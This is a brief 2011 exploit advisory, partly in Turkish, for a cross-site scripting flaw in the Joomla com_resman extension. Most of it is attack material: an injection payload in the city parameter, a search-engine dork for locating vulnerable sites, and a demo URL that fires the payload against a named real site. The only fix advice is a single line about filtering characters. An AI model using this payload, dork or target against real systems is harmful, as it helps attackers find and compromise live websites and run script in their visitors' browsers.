<------------------- header data start ------------------- >
#############################################################
Joomla com_resman XSS Vulnerability                                      
#############################################################

# Author : SOLVER ~ Bug Researchers

# Date : 13.06.2011

# Name : Joomla com_resman 

# Bug Type : XSS (Cross Site Scripting)

# Infection : Hedef sistem uzerinde zararli Javascript kodlari calistirilabilir.

# Explanation : Joomla com_resman eklentisini kullanan sitelerde gorulen bir aciktir.

# Example Vuln : <BODY%20ONLOAD=alert("SOLVER")>

[+] Dork:intext:"com_resman"

[+] Demo: http://corfuvillaowners.com/index.php?option=com_resman&task=list&city=<BODY%20ONLOAD=alert("SOLVER")>

# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################